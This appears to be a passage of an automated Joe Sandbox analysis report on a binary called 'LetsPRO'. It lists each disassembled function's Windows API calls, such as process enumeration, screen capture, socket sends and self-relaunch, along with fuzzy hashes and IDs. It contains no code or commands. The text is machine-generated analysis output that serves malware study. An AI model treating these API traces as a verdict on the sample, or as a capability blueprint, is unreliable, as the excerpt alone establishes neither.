                                        • API String ID: 849931509-1840232981
                                        • Opcode ID: a1ffd81796c282795c83f156190a9ebcf4c9712f8f31f494b20e4dd99a65a192
                                        • Instruction ID: 3fc1168c89291d304ef04a2ae73d0cf71b289b2dd8eec623b1a6d1f85be620e6
                                        • Opcode Fuzzy Hash: a1ffd81796c282795c83f156190a9ebcf4c9712f8f31f494b20e4dd99a65a192
                                        • Instruction Fuzzy Hash: 06E08673246344BFD314A660AD5FF9D7754F78C712F004A1DFB89A5141C552E400C665
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03F3B9DA
                                        • _memset.LIBCMT ref: 03F3B9FB
                                        • _memset.LIBCMT ref: 03F3BA4B
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 03F3BA65
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 03F3BAB7
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                        • String ID:
                                        • API String ID: 2416807333-0
                                        • Opcode ID: 2f7b23a2e4097c39d47549937b6c2489b98e0c57b2a0d115208bd57b0ec5c722
                                        • Instruction ID: 709c57d09656be130588dd5f9a50399fb57d3460b4b8e9473acbed44e9941cce
                                        • Opcode Fuzzy Hash: 2f7b23a2e4097c39d47549937b6c2489b98e0c57b2a0d115208bd57b0ec5c722
                                        • Instruction Fuzzy Hash: 9341E371E00706AFEB20EF60CC95FAAB7B8EF16710F044295ED159B280E775AE41CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc.LIBCMT ref: 03F40EF9
                                          • Part of subcall function 03F3F673: __FF_MSGBANNER.LIBCMT ref: 03F3F68C
                                          • Part of subcall function 03F3F673: __NMSG_WRITE.LIBCMT ref: 03F3F693
                                          • Part of subcall function 03F3F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76), ref: 03F3F6B8
                                        • _free.LIBCMT ref: 03F40F0C
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free_malloc
                                        • String ID:
                                        • API String ID: 1020059152-0
                                        • Opcode ID: 07c3be17730d67f624e46d80bafeef681f95c72b2c74fe86d4863d6a6ab03140
                                        • Instruction ID: 33a2021afff8d451ca7fa86e5ed6e03bb41e447e2c8ce9a1c99487e64f9b4618
                                        • Opcode Fuzzy Hash: 07c3be17730d67f624e46d80bafeef681f95c72b2c74fe86d4863d6a6ab03140
                                        • Instruction Fuzzy Hash: 4C119436C5871BABCB21AF74AC1465ABF59DF412B0B144535FA499F250DF3089828794
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03F34B83
                                        • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03F34B8D
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03F34BA0
                                        • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03F34BA3
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3168844106-0
                                        • Opcode ID: adebf0873f724ec10189cdd6bde5635c2fa830f0ac868554da20188c19ef2422
                                        • Instruction ID: 74836421f084a053d5ed66db9046199788a0b60a63a2cd9d187a9fc68e593f68
                                        • Opcode Fuzzy Hash: adebf0873f724ec10189cdd6bde5635c2fa830f0ac868554da20188c19ef2422
                                        • Instruction Fuzzy Hash: 7801627A6007189FE720EB3AFCC4B5BB7ECEB89354F054969E24683604C774E845CA64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd.LIBCMT ref: 025FE23B
                                          • Part of subcall function 025F997B: __getptd_noexit.LIBCMT ref: 025F997E
                                          • Part of subcall function 025F997B: __amsg_exit.LIBCMT ref: 025F998B
                                        • __getptd.LIBCMT ref: 025FE252
                                        • __amsg_exit.LIBCMT ref: 025FE260
                                        • __lock.LIBCMT ref: 025FE270
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 025FE284
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 745533e09c27ee42908da7af7db4068ea2eff67246d0882d63091b503b9baa5b
                                        • Instruction ID: b25670602b569b850c22fb8cf77b6e1e912127b35e8113be51c7b04c360ed711
                                        • Opcode Fuzzy Hash: 745533e09c27ee42908da7af7db4068ea2eff67246d0882d63091b503b9baa5b
                                        • Instruction Fuzzy Hash: 8AF02432D84B01DBE7A5BB78D80370E3BA2BF81B20F104209EB01671E0DF609541DE4E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __getptd.LIBCMT ref: 03F45012
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __getptd.LIBCMT ref: 03F45029
                                        • __amsg_exit.LIBCMT ref: 03F45037
                                        • __lock.LIBCMT ref: 03F45047
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 03F4505B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 938513278-0
                                        • Opcode ID: 69eef10119ec7e7da51eb9269c8dfe393d78b8db17dbd6b06d25fa8731aad550
                                        • Instruction ID: 2fdd16b930a6f433296cb3265490c51c479d681500c499d12a19ff5e9e7e8c9e
                                        • Opcode Fuzzy Hash: 69eef10119ec7e7da51eb9269c8dfe393d78b8db17dbd6b06d25fa8731aad550
                                        • Instruction Fuzzy Hash: CCF0B43ED05702DBE764FBACAC01B9E7FA0AF01B20F144119D619AF2D0DB788481DA96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 03F3C932
                                        • GetCommandLineW.KERNEL32 ref: 03F3C938
                                        • GetStartupInfoW.KERNEL32(?), ref: 03F3C947
                                        • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 03F3C96F
                                        • ExitProcess.KERNEL32 ref: 03F3C977
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                        • String ID:
                                        • API String ID: 3421218197-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 03F41CD0: _doexit.LIBCMT ref: 03F41CDC
                                        • ___set_flsgetvalue.LIBCMT ref: 03F3F9CA
                                          • Part of subcall function 03F43CA0: TlsGetValue.KERNEL32(00000000,03F43DF9,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000), ref: 03F43CA9
                                          • Part of subcall function 03F43CA0: DecodePointer.KERNEL32(?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06,0000000D), ref: 03F43CBB
                                          • Part of subcall function 03F43CA0: TlsSetValue.KERNEL32(00000000,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06), ref: 03F43CCA
                                        • ___fls_getvalue@4.LIBCMT ref: 03F3F9D5
                                          • Part of subcall function 03F43C80: TlsGetValue.KERNEL32(?,?,03F3F9DA,00000000), ref: 03F43C8E
                                        • ___fls_setvalue@8.LIBCMT ref: 03F3F9E8
                                          • Part of subcall function 03F43CD4: DecodePointer.KERNEL32(?,?,?,03F3F9ED,00000000,?,00000000), ref: 03F43CE5
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 03F3F9F1
                                        • ExitThread.KERNEL32 ref: 03F3F9F8
                                        • GetCurrentThreadId.KERNEL32 ref: 03F3F9FE
                                        • __freefls@4.LIBCMT ref: 03F3FA1E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                        • String ID:
                                        • API String ID: 781180411-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000), ref: 03F3D868
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 03F3D938
                                        • SetLastError.KERNEL32(0000007F), ref: 03F3D963
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Read$ErrorLast
                                        • String ID:
                                        • API String ID: 2715074504-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrlen$_memset
                                        • String ID:
                                        • API String ID: 2425037729-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetLastError.KERNEL32(0000139F), ref: 03F343EC
                                          • Part of subcall function 03F313A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 03F313CB
                                          • Part of subcall function 03F341E0: EnterCriticalSection.KERNEL32(03F34FB5,03F34E55,03F342BE,00000000,?,?,03F34E55,?,?,?,?,00000000,000000FF), ref: 03F341E8
                                          • Part of subcall function 03F341E0: LeaveCriticalSection.KERNEL32(03F34FB5,?,?,?,00000000,000000FF), ref: 03F341F6
                                          • Part of subcall function 03F34C70: HeapFree.KERNEL32(?,00000000,?,00000000,03F34E55,?,03F342C8,03F34E55,00000000,?,?,03F34E55,?), ref: 03F34C97
                                        • SetLastError.KERNEL32(00000000,?), ref: 03F343D7
                                        • SetLastError.KERNEL32(00000057), ref: 03F34401
                                        • WSAGetLastError.WS2_32(?), ref: 03F34410
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                        • String ID:
                                        • API String ID: 2060118545-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WSAEventSelect.WS2_32(?,03F33ABB,00000023), ref: 03F33C02
                                        • WSAGetLastError.WS2_32 ref: 03F33C0D
                                        • send.WS2_32(?,00000000,00000000,00000000), ref: 03F33C58
                                        • WSAGetLastError.WS2_32 ref: 03F33C63
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$EventSelectsend
                                        • String ID:
                                        • API String ID: 259408233-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • EnterCriticalSection.KERNEL32(03F34FB5,03F34E55,03F342BE,00000000,?,?,03F34E55,?,?,?,?,00000000,000000FF), ref: 03F341E8
                                        • LeaveCriticalSection.KERNEL32(03F34FB5,?,?,?,00000000,000000FF), ref: 03F341F6
                                        • LeaveCriticalSection.KERNEL32(03F34FB5), ref: 03F34257
                                        • SetEvent.KERNEL32(8520468B), ref: 03F34272
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterEvent
                                        • String ID:
                                        • API String ID: 3394196147-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • timeGetTime.WINMM(00000001,?,00000001,?,03F33C4F,?,?,00000001), ref: 03F34B15
                                        • InterlockedIncrement.KERNEL32(00000001), ref: 03F34B24
                                        • InterlockedIncrement.KERNEL32(00000001), ref: 03F34B31
                                        • timeGetTime.WINMM(?,03F33C4F,?,?,00000001), ref: 03F34B48
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: IncrementInterlockedTimetime
                                        • String ID:
                                        • API String ID: 159728177-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 025F3647
                                        • _free.LIBCMT ref: 025F367C
                                          • Part of subcall function 025F6F29: HeapFree.KERNEL32(00000000,00000000,?,025F996C,00000000,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253), ref: 025F6F3F
                                          • Part of subcall function 025F6F29: GetLastError.KERNEL32(00000000,?,025F996C,00000000,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253,00000000), ref: 025F6F51
                                        • _malloc.LIBCMT ref: 025F36B7
                                        • _memset.LIBCMT ref: 025F36C5
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                        • String ID:
                                        • API String ID: 3340475617-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 03F3BC70: GetDesktopWindow.USER32 ref: 03F3BC8F
                                          • Part of subcall function 03F3BC70: GetDC.USER32(00000000), ref: 03F3BC9C
                                          • Part of subcall function 03F3BC70: CreateCompatibleDC.GDI32(00000000), ref: 03F3BCA2
                                          • Part of subcall function 03F3BC70: GetDC.USER32(00000000), ref: 03F3BCAD
                                          • Part of subcall function 03F3BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 03F3BCBA
                                          • Part of subcall function 03F3BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 03F3BCC2
                                          • Part of subcall function 03F3BC70: ReleaseDC.USER32(00000000,00000000), ref: 03F3BCD3
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004C), ref: 03F3BD78
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004D), ref: 03F3BD8D
                                          • Part of subcall function 03F3BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 03F3BDA6
                                          • Part of subcall function 03F3BC70: SelectObject.GDI32(?,00000000), ref: 03F3BDB4
                                          • Part of subcall function 03F3BC70: SetStretchBltMode.GDI32(?,00000003), ref: 03F3BDC0
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004F), ref: 03F3BDCD
                                          • Part of subcall function 03F3BC70: GetSystemMetrics.USER32(0000004E), ref: 03F3BDE0
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • _memset.LIBCMT ref: 03F3B1E1
                                        • swprintf.LIBCMT ref: 03F3B204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                        • String ID: %s %s
                                        • API String ID: 1028806752-581060391
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F39115
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF4E
                                          • Part of subcall function 03F3EF39: __CxxThrowException@8.LIBCMT ref: 03F3EF63
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF74
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F39128
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 963545896-2556327735
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __CxxThrowException@8.LIBCMT ref: 03F3941D
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F3944A
                                        Strings
                                        • invalid string position, xrefs: 03F39445
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                        • String ID: invalid string position
                                        • API String ID: 3614006799-1799206989
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __output_l.LIBCMT ref: 03F3F815
                                          • Part of subcall function 03F3F91B: __getptd_noexit.LIBCMT ref: 03F3F91B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit__output_l
                                        • String ID: B
                                        • API String ID: 2141734944-1255198513
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 03F3D1D4
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF4E
                                          • Part of subcall function 03F3EF39: __CxxThrowException@8.LIBCMT ref: 03F3EF63
                                          • Part of subcall function 03F3EF39: std::exception::exception.LIBCMT ref: 03F3EF74
                                        • _memmove.LIBCMT ref: 03F3D20D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: vector<T> too long
                                        • API String ID: 1785806476-3788999226
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 03F5010A: __getptd.LIBCMT ref: 03F50110
                                          • Part of subcall function 03F5010A: __getptd.LIBCMT ref: 03F50120
                                        • __getptd.LIBCMT ref: 03F506E3
                                          • Part of subcall function 03F43E5B: __getptd_noexit.LIBCMT ref: 03F43E5E
                                          • Part of subcall function 03F43E5B: __amsg_exit.LIBCMT ref: 03F43E6B
                                        • __getptd.LIBCMT ref: 03F506F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Execution Graph

                                        Execution Coverage:0%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:59
                                        Total number of Limit Nodes:2

                                        Control-flow Graph

                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6C93BED5), ref: 6C94A303
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A30C
                                        • GetLastError.KERNEL32(?,?,?,?,6C93BED5), ref: 6C94A312
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,6C93BED5), ref: 6C94A32A
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,?,?,6C93BED5), ref: 6C94A338
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6C93BED5), ref: 6C94A351
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A354
                                        • GetLastError.KERNEL32(?,?,?,?,6C93BED5), ref: 6C94A35A
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6C93BED5), ref: 6C94A37A
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A37D
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6C93BED5), ref: 6C94A397
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A39A
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6C93BED5), ref: 6C94A3B4
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A3B7
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6C93BED5), ref: 6C94A3D1
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A3D4
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6C93BED5), ref: 6C94A3EE
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A3F1
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6C93BED5), ref: 6C94A40F
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A412
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6C93BED5), ref: 6C94A430
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A433
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6C93BED5), ref: 6C94A451
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A454
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6C93BED5), ref: 6C94A472
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A475
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6C93BED5), ref: 6C94A493
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A496
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6C93BED5), ref: 6C94A4B4
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A4B7
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6C93BED5), ref: 6C94A4D5
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A4D8
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6C93BED5), ref: 6C94A4F6
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A4F9
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6C93BED5), ref: 6C94A517
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A51A
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6C93BED5), ref: 6C94A538
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C94A53B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
